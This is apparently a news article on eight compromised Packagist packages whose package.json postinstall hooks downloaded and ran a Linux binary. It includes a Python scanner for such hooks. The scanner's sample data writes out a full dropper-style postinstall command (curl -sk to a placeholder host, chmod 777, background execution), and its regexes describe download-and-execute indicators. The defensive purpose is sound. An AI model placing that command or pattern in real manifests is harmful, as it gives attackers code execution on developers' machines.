At a glance: Attackers exploit a cross-ecosystem blind spot by abusing package.json lifecycle hooks that developers overlook when reviewing PHP dependencies.
Eight Composer packages on Packagist have been compromised in a coordinated attack with malicious code that downloads a Linux binary from GitHub. The notable detail: the malicious code was embedded not in composer.json but in package.json, targeting the JavaScript build tooling shipped alongside the PHP code.
Analysis by Socket identified eight Packagist packages containing malicious code in their package.json files. The affected packages (with the compromised development branch in parentheses) are: moritz-sauer-13/silverstripe-cms-theme (dev-master), crosiersource/crosierlib-base (dev-master), devdojo/wave (dev-main), devdojo/genesis (dev-main), katanaui/katana (dev-main), elitedevsquad/sidecar-laravel (3.x-dev), r2luna/brain (dev-main), and baskarcm/tzi-chat-ui (dev-main). The manipulated versions have since been removed from Packagist.
The attack relies on postinstall scripts in package.json, which npm runs automatically at the end of npm install: the script attempts to download a Linux binary from a GitHub releases URL (github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f), stores it under /tmp/.sshd, makes it executable for all users via chmod, and launches it in the background. Socket found the same payload in 777 files on GitHub, indicating a broader campaign. In at least two cases the code was also embedded in GitHub workflow files, suggesting that the attackers deployed several execution mechanisms in parallel.
The nature of the downloaded malware remains unclear, as the GitHub account hosting the repository is no longer available. The binary's name, “gvfsd-network”, is notable because it mimics a GNOME Virtual File System (GVfs) daemon responsible for managing network shares; this is most likely a masquerading technique to make the process blend in with legitimate system daemons.
Detection is hard for development teams: tooling that scans PHP dependencies typically focuses on Composer metadata and overlooks package.json lifecycle hooks shipped in the same packages. The dropper script alone is severe enough to warrant blocking: it yields remote code execution during installation or build workflows, disables TLS verification, suppresses errors, and executes a downloaded binary in the background.
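For teams that want to surface these hooks next to their Composer metadata, the following is an added example written for this article (it is not Socket's detection logic and not code from any of the packages named above). It walks a Composer vendor/ tree, parses every package.json, and flags only the npm lifecycle hooks that run without developer action, scoring them on the indicators the article describes together: a remote download, disabled TLS verification, suppressed errors, a dotted /tmp path, chmod, and backgrounding. The sample tree it builds, including the hypothetical dropper command and the example.invalid URL, is constructed for the demonstration; the real campaign's URL is the one quoted above.

```python
"""Flag dropper-style npm lifecycle hooks inside a Composer vendor/ tree. Added example
for this article, not Socket's tooling; the sample tree and example.invalid URL are constructed."""
import json
import os
import re
import tempfile
from dataclasses import dataclass

# Hooks npm runs on its own during npm install / npm ci; other "scripts" entries run only by name.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall",
                   "preprepare", "prepare", "postprepare", "prepublish"}


def _short_flag(letter):
    """Regex for a POSIX short-option cluster containing `letter` (" -k", " -sk", " -fsSL")."""
    return re.compile(r"(?:^|\s)-[a-zA-Z]*%s[a-zA-Z]*(?=\s|$)" % letter)


# Heuristics mirroring the behaviour the article describes; each is noisy alone, so severity
# escalates only when several land in one hook, which legitimate build steps almost never do.
INDICATORS = {
    "remote_download": [re.compile(r"\b(curl|wget)\b.*https?://", re.I)],
    "tls_verify_disabled": [_short_flag("k"), re.compile(r"--insecure|--no-check-certificate")],
    "error_suppression": [re.compile(r"2>\s*/dev/null|\|\|\s*true|--silent|--quiet"),
                          _short_flag("s"), _short_flag("q")],
    "hidden_tmp_path": [re.compile(r"/tmp/\.[A-Za-z0-9_-]+")],
    "chmod_exec": [re.compile(r"\bchmod\s+(?:[ugoa]*\+[rw]*x\w*|[0-7]*[1357][0-7]*)\b")],
    "background_exec": [re.compile(r"&\s*$|\bnohup\b|\bsetsid\b|\bdisown\b")],
}


@dataclass
class Finding:
    path: str
    hook: str
    script: str
    indicators: list

    @property
    def severity(self):
        n = len(self.indicators)
        if "remote_download" in self.indicators and n >= 3:
            return "critical"  # fetches code and also hides, chmods or backgrounds it
        return "high" if n >= 2 else "low"


def inspect_scripts(scripts):
    """Return {hook: [indicator, ...]} for lifecycle hooks that trip any indicator."""
    hits = {}
    for hook, cmd in (scripts.items() if isinstance(scripts, dict) else ()):
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue  # "build", "test", ... never run unattended
        found = [name for name, pats in INDICATORS.items() if any(p.search(cmd) for p in pats)]
        if found:
            hits[hook] = found
    return hits


def scan_vendor_tree(root):
    """Walk root (e.g. vendor/) and return one Finding per flagged lifecycle hook."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON: nothing npm could execute
        scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
        for hook, found in inspect_scripts(scripts).items():
            findings.append(Finding(path, hook, scripts[hook], found))
    return sorted(findings, key=lambda f: (f.path, f.hook))


def build_sample_tree():
    """Constructed vendor/ tree: a clean theme (indicators only in its non-lifecycle "test"
    script) and a dropper-style postinstall modelled on the article's pattern (placeholder URL)."""
    root = tempfile.mkdtemp(prefix="vendor-")
    manifests = {
        "acme/theme/package.json": json.dumps({"name": "acme-theme", "scripts": {
            "build": "vite build", "postinstall": "npm run build",
            "test": "curl -k https://example.invalid/fixtures 2>/dev/null"}}),
        "acme/starter/package.json": json.dumps({"name": "acme-starter", "scripts": {
            "postinstall": "mkdir -p /tmp/.sshd && curl -sk -o /tmp/.sshd/helper "
                           "https://example.invalid/releases/helper 2>/dev/null; "
                           "chmod 777 /tmp/.sshd/helper; /tmp/.sshd/helper &"}}),
    }
    for rel, body in manifests.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":  # in practice, point scan_vendor_tree() at a real vendor/ directory
    for f in scan_vendor_tree(build_sample_tree()):
        print(f"[{f.severity}] {f.path} {f.hook}: {', '.join(f.indicators)}\n    {f.script}")
```

Only the starter package's postinstall is reported, at critical severity; the theme's test script carries the same curl flags but is never run by npm on its own, so it stays silent. Where the build does not depend on lifecycle hooks, the cheaper control is to disable them outright with npm ci --ignore-scripts (or npm config set ignore-scripts true); the scanner is for the case where scripts must stay enabled and a reviewer wants the hooks surfaced alongside the Composer metadata.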
Source: ainews-dev.lumi-systems.io · Published May 23, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.5.2.